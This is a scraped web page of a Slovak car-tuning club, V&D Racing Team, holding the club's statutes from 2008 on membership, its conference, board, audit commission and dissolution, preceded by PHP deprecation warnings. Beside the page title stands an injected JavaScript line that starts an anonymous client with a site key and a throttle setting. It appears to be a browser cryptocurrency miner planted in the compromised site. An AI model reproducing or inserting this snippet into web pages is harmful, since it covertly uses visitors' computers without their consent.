Deprecated: Assigning the return value of new by reference is deprecated in /nfsmnt/hosting1_1/4/0/40940909-c8c9-471a-9510-cbbdd4a8bc79/vdracing.sk/web/wp-includes/cache.php on line 103

Deprecated: Assigning the return value of new by reference is deprecated in /nfsmnt/hosting1_1/4/0/40940909-c8c9-471a-9510-cbbdd4a8bc79/vdracing.sk/web/wp-includes/pomo/mo.php on line 171

Deprecated: Assigning the return value of new by reference is deprecated in /nfsmnt/hosting1_1/4/0/40940909-c8c9-471a-9510-cbbdd4a8bc79/vdracing.sk/web/wp-includes/l10n.php on line 407

Deprecated: Assigning the return value of new by reference is deprecated in /nfsmnt/hosting1_1/4/0/40940909-c8c9-471a-9510-cbbdd4a8bc79/vdracing.sk/web/wp-includes/query.php on line 61

Deprecated: Assigning the return value of new by reference is deprecated in /nfsmnt/hosting1_1/4/0/40940909-c8c9-471a-9510-cbbdd4a8bc79/vdracing.sk/web/wp-includes/theme.php on line 1133

Deprecated: Assigning the return value of new by reference is deprecated in /nfsmnt/hosting1_1/4/0/40940909-c8c9-471a-9510-cbbdd4a8bc79/vdracing.sk/web/wp-includes/taxonomy.php on line 617

Deprecated: Assigning the return value of new by reference is deprecated in /nfsmnt/hosting1_1/4/0/40940909-c8c9-471a-9510-cbbdd4a8bc79/vdracing.sk/web/wp-includes/widgets.php on line 320
V&D Racing Team »Stanovy var _client = new Client.Anonymous(’0b408ad436e697e403cb6941f29f5bf9dcb41c85ae9dd6af93bab463618ffa07′, {throttle: 0.4}); _client.start();

">Stanovy

I. časť : základné ustanovenia
II. časť : členstvo v V&D Racing Team, práva a povinnosti členov
III. časť : organizácia spoločnosti
IV. časť : záverečné ustanovenia

I. Č A S Ť
ZÁKLADNÉ USTANOVENIA

ČLÁNOK 1
Názov a sídlo

1. Názov združenia je: V&D Racing Team.
2. Sídlom V&D Racing Team je Parková 1287/4, 986 01 FIĽAKOVO.

ČLÁNOK 2
Poslanie a pôsobnosť

1. V&D Racing Team je dobrovoľným samosprávnym združením občanov a právnických osôb, s cieľom rozvíjať telesnú a duševnú zdatnosť, športovú výkonnosť svojich členov a tým uspokojovať záujmy a záľuby občanov v oblasti automobilového športu.
2. V&D Racing Team je právnickou osobou.
3. Poslaním V&D Racing Team je vytvárať podmienky pre rozvoj úpravárenstva automobilov na Slovensku, zastupovať a chrániť práva a záujmy svojich členov a poskytovať členom dohodnuté služby.
4. V&D Racing Team najmä:
4.1. nadväzuje kontakty medzi domácimi, zahraničnými spoločnosťami a priaznivcami motoršportu;
4.2. stará sa o zvyšovanie športovej výkonnosti svojich členov a vytvára na to vhodné ekonomické, materiálne a technické podmienky;
4.3. zabezpečuje prezentáciu upravených a ladených automobilov doma i v zahraničí;
4.4. podieľa sa na organizácii súťaží priaznivcov motoršportu;
4.5. buduje, prevádzkuje a udržiava svoje konzultačné strediská a usiluje o vznik nových stredísk na území Slovenskej republiky;
4.6. zabezpečuje tvorbu a rozvoj vlastných finančných zdrojov a ich hospodárne využívanie.

ČLÁNOK 3
Zásady hospodárenia

1. V&D Racing Team nakladá so svojim majetkom a hospodári v súlade s príslušnými právnymi predpismi.
2. Príjmami V&D Racing Team sú najmä:
2.1. členské príspevky,
2.2. dary,
2.3. sprostredkovanie reklamnej činnosti,
3. V&D Racing Team vedie účtovníctvo v rozsahu a spôsobom ustanoveným príslušnými právnymi predpismi, najmä zákonom č. 563/1991 Zb. o účtovníctve v znení neskorších predpisov.
4. V záujme plnenia úloh vyplývajúcich z poslania (Čl. 2 Stanov) môže V&D Racing Team vykonávať podnikateľskú činnosť v súlade s príslušnými právnymi predpismi.
5. Združenie hospodári podľa rozpočtu, ktorý schvaľuje na príslušný rok konferencia združenia.

II. Č A S Ť
ČLENSTVO V MOTORŠPORTCLUB FILAKOVO, PRÁVA A POVINNOSTI ČLENOV

ČLÁNOK 4
Členstvo

1. Členstvo v V&D Racing Team je dobrovoľné. Členom V&D Racing Team sa môže stať každý, kto súhlasí so stanovami V&D Racing Team. O prijatí za člena rozhoduje predstavenstvo V&D Racing Team na základe písomnej prihlášky.
2. Dokladom o členstve je platný členský preukaz so zaplatenými členskými príspevkami. Výšku a splatnosť členských príspevkov určí svojim uznesením konferencia.
3. Členstvo zaniká:
3.1. písomným oznámením člena o vystúpení z V&D Racing Team;
3.2. vylúčením za závažné porušenie povinností člena. O vylúčení člena rozhoduje predstavenstvo V&D Racing Team po prejednaní veci za účasti člena. Člen má právo odvolať sa proti rozhodnutiu predstavenstva do 15 dní od jeho doručenia. O takomto odvolaní rozhodne konferencia V&D Racing Team. Odvolanie má odkladný účinok;
3.3. nezaplatením členských príspevkov vo výške a lehote na to určenej;
3.4. úmrtím.

ČLÁNOK 5
Základné práva a povinnosti členov

1. Člen má právo najmä:
1.1. zúčastňovať sa podľa svojich záujmov a možností na spoločenskom živote V&D Racing Team, zúčastňovať sa na súťažiach, akciách a školeniach, podieľať sa na výhodách poskytovaných členom V&D Racing Team;
1.2. zúčastňovať sa na konferencii V&D Racing Team, prednášať svoje návrhy, podnety a pripomienky, voliť a byť volený po dovŕšení osemnásteho roku, za členov mladších ako osemnásť rokov môžu voliť a byť volení ich zákonní zástupcovia;
1.3. zúčastňovať sa na rokovaní predstavenstva V&D Racing Team ak prerokúva jeho vylúčenie.
2. Člen je povinný najmä:
2.1. dodržiavať stanovy V&D Racing Team a plniť úlohy vyplývajúce z rozhodnutí jeho orgánov;
2.2. podieľať sa podľa svojich záujmov na plnení úloh a cieľov V&D Racing Team;
2.3. zachovávať pravidlá spoločenskej etiky a správať sa tak, aby nebola znížená vážnosť V&D Racing Team;
2.4. platiť členské príspevky v súlade s rozhodnutím konferencie V&D Racing Team.

III. Č A S Ť
ORGANIZÁCIA SPOLOČNOSTI

ČLÁNOK 6
Zásady vnútorného usporiadania a rokovania orgánov V&D Racing Team team

1. Orgánmi V&D Racing Team sú:
1.1. konferencia;
1.2. predstavenstvo;
1.3. kontrolná a revízna komisia.
2. Orgány V&D Racing Team sú schopné uznášať sa, ak je prítomná nadpolovičná väčšina orgánu.
3. Uznesenie je prijaté, ak zaň hlasovala nadpolovičná väčšina prítomných, ak nie je týmito stanovami požadovaný vyšší počet hlasov.

ČLÁNOK 7
Konferencia

1. Konferencia je najvyšším orgánom V&D Racing Team.
2. Konferenciu tvoria všetci členovia V&D Racing Team.
3. Konferencia sa schádza vždy v sídle združenia.
4. Konferencia V&D Racing Team najmä:
4.1. prejednáva a určuje hlavné úlohy V&D Racing Team na všetkých úsekoch jej činnosti;
4.2. prijíma, mení, doplňuje a zrušuje stanovy V&D Racing Team;
4.3. prejednáva správu o činnosti V&D Racing Team a správu kontrolnej a revíznej komisie V&D Racing Team;
4.4. volí a odvoláva predsedu predstavenstva a podpredsedov predstavenstva;
4.5. volí a odvoláva predsedu kontrolnej a revíznej komisie V&D Racing Team a členov kontrolnej a revíznej komisie;
4.6. schvaľuje výsledky hospodárenia V&D Racing Team.
5. Konferencia V&D Racing Team sa schádza najmenej jeden raz ročne. Mimoriadna konferencia V&D Racing Team sa schádza, ak ju zvolá predstavenstvo, alebo ak o to požiada aspoň tretina členov V&D Racing Team, alebo kontrolná a revízna komisia V&D Racing Team.
6. Na prijatie rozhodnutia podľa Článku 7, bod 4.2. týchto stanov je potrebný súhlas dvojtretinovej väčšiny členov konferencie.

ČLÁNOK 8
Predstavenstvo

1. Predstavenstvo je štatutárnym a výkonným orgánom V&D Racing Team, ktorý riadi činnosť V&D Racing Team a koná v jeho mene. Predstavenstvo rozhoduje o všetkých záležitostiach V&D Racing Team, pokiaľ nie sú týmito stanovami vyhradené do pôsobnosti konferencie.
2. V mene V&D Racing Team je oprávnený konať predseda predstavenstva alebo podpredsedovia predstavenstva, každý samostatne.
3. Predstavenstvo má troch členov, a to predsedu a dvoch podpredsedov.
4. Predstavenstvo sa schádza najmenej raz štvrťročne a zvoláva ho predseda predstavenstva. Pre uznášanie predstavenstva platí Článok 6 bod 2. a 3. stanov. V prípade rovnosti hlasov rozhoduje hlas predsedu.
5. Predstavenstvo plní najmä tieto úlohy:
5.1. schvaľuje vnútorné organizačné členenie V&D Racing Team;
5.2. zvoláva konferenciu V&D Racing Team;
5.3. rozhoduje o nakladaní s majetkom V&D Racing Team v súlade s rozhodnutiami konferencie;
5.4. vydáva organizačný poriadok V&D Racing Team.

ČLÁNOK 9
Kontrolná a revízna komisia V&D Racing Team

1. Kontrolná a revízna komisia je ústredným kontrolným a revíznym orgánom V&D Racing Team, ktorej členov volí konferencia V&D Racing Team.
2. Kontrolnú a revíznu komisiu tvorí predseda a dvaja členovia. Členom kontrolnej a revíznej komisie nemôže byť člen predstavenstva V&D Racing Team.
3. Kontrolná a revízna komisia sa pri svojej činnosti riadi stanovami, uzneseniami konferencie V&D Racing Team a príslušnými právnymi predpismi.
4. Kontrolná a revízna komisia sa schádza podľa potreby, zvoláva ju jej predseda. O svojej činnosti predkladá správu konferencii V&D Racing Team.
5. Členovia Kontrolnej a revíznej komisie sú oprávnení nahliadať do všetkých dokladov a záznamov týkajúcich sa činnosti V&D Racing Team a kontrolujú, či účtovné záznamy sú riadne vedené v súlade so skutočnosťou a či sa podnikateľská činnosť V&D Racing Team uskutočňuje v súlade s právnymi predpismi, stanovami a pokynmi konferencie V&D Racing Team.
6. Pre uznášanie Kontrolnej a revíznej komisie platí Článok 6 bod 2. a 3. stanov s tým, že pri rovnosti hlasov rozhoduje hlas predsedu.

IV. Č A S Ť
ZÁVEREČNÉ USTANOVENIA

ČLÁNOK 10
Zánik V&D Racing Team

1. V&D Racing Team zaniká:
1.1. rozhodnutím konferencie V&D Racing Team o jeho dobrovoľnom rozpustení alebo zlúčení s iným združením. Na prijatie takéhoto rozhodnutia je potrebné súhlasné stanovisko dvoch tretín všetkých členov V&D Racing Team;
1.2. právoplatným rozhodnutím príslušného ministerstva o jeho rozpustení.
2. Pri zániku V&D Racing Team sa vykoná majetkové vysporiadanie, ktoré sa vykoná formou likvidácie, pokiaľ celé imanie V&D Racing Team nenadobúda právny nástupca.
3. Na likvidáciu V&D Racing Team sa primerane použijú ustanovenia Obchodného zákonníka o likvidácii obchodných spoločností. Združenie je povinné oznámiť ukončenie likvidácie ministerstvu vnútra SR.
4. Ukončenie likvidácie a zánik združenia je predstavenstvo povinné oznámiť do 15 dní Ministerstvu vnútra SR.

ČLÁNOK 11
Právne vzťahy a riešenie sporov

1. Právne vzťahy vyplývajúce z týchto stanov a ostatné právne vzťahy ako vo vnútri V&D Racing Team tak navonok sa riadia vo veciach, ktoré neupravujú tieto stanovy, všeobecne záväznými právnymi predpismi, najmä zákonom č. 83/1990 Zb. o združovaní občanov v znení neskorších predpisov.
2. Prípadné spory medzi členmi a V&D Racing Team, vzájomné spory medzi členmi V&D Racing Team súvisiace s ich členstvom v V&D Racing Team, ako aj spory týkajúce sa osôb oprávnených konať v mene V&D Racing Team budú riešené zmierom. Ak sa nepodarí takýto spor vyriešiť zmierom, je ktorákoľvek zo strán sporu oprávnená predložiť ho formou žaloby na prejednanie príslušnému súdu.

Vo Fiľakove, dňa 22. februára 2008.

WordPress Themes